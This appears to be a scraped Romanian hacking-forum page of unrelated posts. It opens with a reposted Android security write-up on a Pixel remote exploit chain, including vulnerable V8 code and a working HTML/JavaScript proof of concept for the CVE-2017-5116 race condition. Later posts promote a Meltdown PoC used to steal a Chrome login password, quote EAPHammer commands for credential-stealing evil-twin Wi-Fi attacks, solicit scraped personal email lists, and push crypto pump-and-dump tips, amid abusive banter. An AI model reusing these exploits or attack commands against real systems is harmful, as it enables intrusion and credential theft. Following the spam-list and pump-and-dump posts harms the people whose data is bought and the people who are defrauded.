Leaderboard

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd. Technical details of a Pixel remote exploit chain The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116) New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length); } A simple PoC is as follows: <html> <h1>poc</h1> <script id="worker1"> worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(arg.data); var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } } } </script> <script> function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; } var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" }) var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web worker var sta = getSharedTypedArray(); worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web worker setTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000); //worker.terminate(); </script> </html> Restul aici. Sursa la fel.

Pe de alta parte te poti angaja in o mie de locuri pe security fara bac si experienta, iti recomand https://www.olx.ro/locuri-de-munca/q-agent-de-securitate/

Dupa 5-6 saptamani e $2.76. Onorezi 20% din “pariu”? Am luat ceva la plezneala, daca ajunge la $10-15 mai incolo sunt multumit.

In UK nu iti recunoaste nimeni diplomele de la Laba SRL aia din Romania. Iti trebuie diplomele de la scoala. Eventual vezi ce poti lua de pe Brainbench. (ai sanse mult mai mari sa-ti fie recunoscute) Fara suparare, vezi ce spun si colegii de pe forum

Cine mai foloseste combine in 2018 ?

Sistemul nostru de invatamant e departe de a fi perfect, dar multi fac greseala de a-l considera inutil. Sunt multi profesori care ar dori sa faca multe schimbari dar nu au puterea necesara. Sunt convins ca o sa fie mai bine cu timpul, chiar daca o sa treaca mai multe generatii. Multi ajung sa isi puna intrebarea "La ce-mi trebuie scoala? Ca n-o sa folosesc nimic de aici cand ma angajez, fac afacere etc.", fara sa se gandeasca prea mult mai departe. Eu consider ca matematica si romana sunt la fel de importante pentru un elev, si nu se gasesc intamplator in examenul de bacalaureat. Matematica, multe formule inutile care se spune ca nu folosesc nimanui in viata, iti formeaza gandirea logica, atentia la detalii, rabdarea, perseverenta, rezolvarea eficienta a problemelor, pornind de la probleme mai simple, si pana la probleme mai complicate, unde inveti sa integrezi mai multe cunostinte pentru a rezolva ceva mai complex. Nu toata lumea o sa foloseasca analiza matematica in viata de zi cu zi, dar o sa stie sa ia decizii mai bune in viata si o sa poata rezolva mai cu usurinta probleme de orice fel, pentru ca pana in punctul acesta a invatat cum sa gandeasca mai eficient. Limba romana, timp pierdut citind si analizand opere literare despre care n-o sa te intrebe nimeni nimic. Dar totusi lumea o sa iti acorde mai multa atentie cand o sa vada ca stii sa iti exprimi clar ideile, si ca poti sa te faci inteles. E o placere sa vorbesti cu oameni cu vocabular bogat, decat cu cei care folosesc organe genitale ca sa acopere lipsa de cuvinte care le ingreuneaza exprimarea. O persoana care a promovat un examen de bacalaureat, dovedeste ca si-a dezvoltat macar o mica parte din aptitudinile de mai sus, ceea ce, ca angajator, iti mareste increderea ca e capabil mai departe sa se dezvolte ca angajat al tau. Poate iti gasesti un loc de munca acum fara diploma de bac, dar n-o sa lucrezi acolo toata viata. Poate dau faliment, poate isi schimba politica si dau afara pe cei fara bac, sau poate ramai pe un salar de nimic toata viata, pentru ca o firma mare niciodata n-o sa angajeze oameni fara bac. Ce faci dupa, daca nu mai gasesti firme care sa angajeze oameni fara bac? Spuneai mai sus: "am primit cateva oferte si una dintre ele nu a spus ca trebuie neaparat BAC ca asa scrie nu stiu unde". De aici reiese ca doar o firma nu ti-a cerut diploma de bac, ceea ce e mi se pare un procentaj nesemnificativ. Eu iti recomand sa il dai. Daca te concentrezi un an pe asta, o sa il treci, si apoi o sa stai linistit toata viata, altfel risti sa pierzi oportunitati mai mari tocmai din cauza asta, sau sa fii la mila altora, si o sa regreti. Iti urez succes.

Salutari, tuturor! Dupa cum spune si anuntul cumpar lista de emailuri romanesti. As prefera un scrape ale conturilor de facebook ce au emailul la public sau daca nu emailuri de persoane fizice luate din motor. Nu ma intereseaza emailuri de persoane juridice. Platesc bancar sau paypal. Multumesc!

Hi Reehal, look here

Ciocan man! :))))

La volumul relativ mic de tranzactii probabil tu ai crescut pretul dupa orderul tau Sa vedem ce o fi...

Fa poze la ce ai acolo dupa ataseaza aici si discutam... dar mai de aproape sa ne dam seama ce este pe placa aia, fa rost de letcon, pasta si fludor daca e vorba de o placa

@individual14XX Oricand ^__^ Nu e nevoie sa devii un guru al PHP-ul(sau al oricarui alt limbaj) inainte sa te apuci de proiect, numai sa simti cum merge si ce posibilitati are limbaju'/paradigma(OOP si procedurala), dupa care sa iti faci un design(schema) initial cu ce lucruri ai nevoie si dupa daca ceva nu merge la unul dintre ele sau nu stii de unde sa le apuci bagi research, cauti ce functii care te-ar ajuta exista(nu te apuca sa reinventezi roata, desi amuzant, uneori mananca timp si s-ar putea s-o faci mai prost ca ce e deja in limbaj/librarie) etc. Incearca sa nu ramai impotmolit in lucruri de genul "ah, nu-mi iese nustiuce pe care l-am facut nustiucum" aka sa nu-ti fie frica sau lene sa stergi bucata aia de cod sa refaci de la 0 eventual in alt mod care ar merge. Also, desginu' initial, am zis initial pentru ca probabil o sa-l schimbi o sa mai adaugi/scoti lucruri, nu e ceva fix cand faci un proiect de capul tau fara specificatii, doar sa nu o dai nici in extrema cealalta si sa ajungi sa ai o shaorma cu de toate. O sa ma opresc acum,deja o dau in offtopic, bafta in continuare ^___^

Eu am firma si nu am consultat pe nimeni ca s-o deschid si nici nu am automatici si matematici si nu stiu ce uber skill-uri. Invat in permanenta cate ceva si incerc sa ma perfectionez. O firma te motiveaza sa tragi mai tare, sa dai din coate, sa vrei mai multe de la tine. Tot o ardeti cu diplomele vietii, mai da-le in pla de diplome. Puneti-vi-le in rame si atarnati-le pe pereti! Am bacu' si am facut cursuri acreditate de Ministerul Invatamantului ca sa-mi pot deschide firma, desi la PFA dpdv legal ar trebui sa poti desfasura orice activitate, exceptandu-le pe cele cu regim special (servicii medicale, detectivi, etc), NUMAI CA NU E ASA PT. CA ROMANIA! Am fost si la Poli, am incercat, o mizerie. Fumuri multe, profesori ceausisti cu gandire obtuza. Unii care vin cu hartii ingalbenite de timp si predau de pe ele. Cursurile platite pe acolo sunt la fel ca budele din cadrul facultatii. Eu ca sa-mi dau seama unde sunt intr-un loc, prima oara ma duc la buda (true fact). Cum plm sa inveti calculatoare pe hartie, cum? Ca sa nu mai zic ca in primii 2 ani bagi matematica la Greuceanu. Suntem in 2018 in pula calului, lasati fitilele astea cu te formeaza ca individ, te ajuta s-o decalotezi mai bine. De parca traim vreo 200-300 de ani. Totul se intampla cu repeziciune. Cu aprofundarea asta exacerbata ramai sarac si ajungi batran sau te faci profesor. Inclusiv in constructii in domeniul proiectarii sunt soft-uri extraordinare cum e Nemetschek Allplan care calculeaza tot (incarcari, rezistente,etc) nu mai stai sa faci calcule si proiecte pe hartie, cu rigla, compas. Mereti la facultati, stati pe banii parintilor, ca sa aveti primul job la 25-30 de ani. Pe urma toti angajatorii or sa invoce treaba asta cu lipsa de experienta si o sa lucrati cel putin 1 an pe un post de junior pe 2000-3000 de ron, dar "nici o problema ca veti putea castiga pana la 2000 de euro, se avanseaza foarte repede, totul depinde numai de voi." Nu haliti kkt-urile astea si nu faceti greseala sa intrati in hora asta a angajatorilor.

Sau faci un curs si se rezolva problema cu COR-ul si functia ocupata. https://ro-ro.facebook.com/cursautorizat/posts/643471589156758

Potoleste-te obsedatul lumii!! Crezi ca sta cineva dupa fundul tau sa iti raspunda la minut, asa cum te-a invatat draga de ma-ta? Ai dracu’ rabdare si daca se gaseste cineva cu chef iti va raspunde. Poti da edit la postari, nu e nevoie sa umpli forum-ul cu mesaje.

Da-ti putin silinta si ia bacu'! E un kkt de examen. Iar pe urma te angajezi si faci bani si te inscrii si la o facultate, ceva la FR/FF, o particulara d-asta, oricum mai toate acum sunt de mare porc. In Romania se pune accent pe hartii si fara patalama nu prea te baga lumea in seama, mai ales companiile serioase care lucreaza cu firme de HR, iar la HR sunt toate frustratele care stiu doar sa-si faca unghiutele si sa clefeteasca guma toata ziua. Poti sa prinzi la start-up-uri, dar o sa fii exploatat pe bani putini. "Ca e mai greu la inceput, pana ne dezvoltam". "Noi aici suntem o familie!" "Trebuie sa invatam si sa facem de toate". Numai ca sefuletii pe urma isi iau Jeepane si pleaca in vacante in Caraibe si uita de "familia" de la birou.

Ai inceput in sens invers. Documenteaza-te serios si apoi apuca-te de treaba, pentru ca e clar ca n-ai studiat suficient daca pui intrebari d-astea. Yobit si Cryptopia, LTC, pump and dump pe HitBTC, DCN coin o sa fluctueze grosolan Sa ai in vedere Verge si Status.

http://groups.csail.mit.edu/mac/classes/6.805/articles/money/nsamint/nsamint.htm

Fix o pula. Daca nu ai diploma de bac, nu te poate angaja ca programator, caci la incadrare, trebuie sa specifice codul COR al functiei pe care esti incadrat. Fara diploma de bac, te poate angaja ca portar, necalificat, femeie de servici, etc, plm, insa vei pierde la bani, caci iti va fi impozitat venitul, comparativ cu acelasi venit brut care It-istilor nu le va fi impozitat. (asta daca nu ne mint iar politicienii). in +, nu vei putea trece in cv ca ai lucrat ca programator, x ani, experienta, plm, cand tu ai fost incadrat ca zidar, chiar daca nu ai pus mana pe o caramida, ci ai fost un fel de Brancusi in php si Eminescu al pytonului.

Salutare, Aici avem singurul PoC real de meltdown, care functioneaza fara probleme (probat de mine). https://github.com/IAIK/meltdown This repository contains several videos demonstrating Meltdown Video #1 shows how Meltdown can be used to spy in realtime on a password input. Video #2 shows how Meltdown leaks physical memory content. Video #3 shows how Meltdown reconstructs a photo from memory. Video #4 shows how Meltdown reconstructs a photo from memory which is encoded with the FLIF file format. Video #5 shows how Meltdown leaks uncached memory. Am incercat sa scot parola de la un login de chrome (parola nefiind salvada, decat introdusa pentru login) merge ca si uns. Hai, la joaca!

eaphammer by Gabriel Ryan (s0lst1c3) Overview EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to setup and execute a credential stealing evil twin attack against a WPA2-TTLS network in just two commands: # generate certificates ./eaphammer --cert-wizard # launch attack ./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds Leverages a lightly modified version of hostapd-wpe (shoutout to Brad Anton for creating the original), dnsmasq, Responder, and Python 2.7. Features Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks. Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots Perform captive portal attacks Built-in Responder integration Support for Open networks and WPA-EAP/WPA2-EAP No manual configuration necessary for most attacks. No manual configuration necessary for installation and setup process Leverages latest version of hostapd (2.6) Support for evil twin and karma attacks Generate timed Powershell payloads for indirect wireless pivots Integrated HTTP server for Hostile Portal attacks Support for SSID cloaking Upcoming Features Perform seemeless MITM attacks with partial HSTS bypasses Support attacks against WPA-PSK/WPA2-PSK directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL) Integrated website cloner for cloning captive portal login pages Integrated HTTP server for captive portals Sursa: https://github.com/s0lst1c3/eaphammer

A glumit! Totul a fost o farsa. Terminati, ca nu e chiar asa!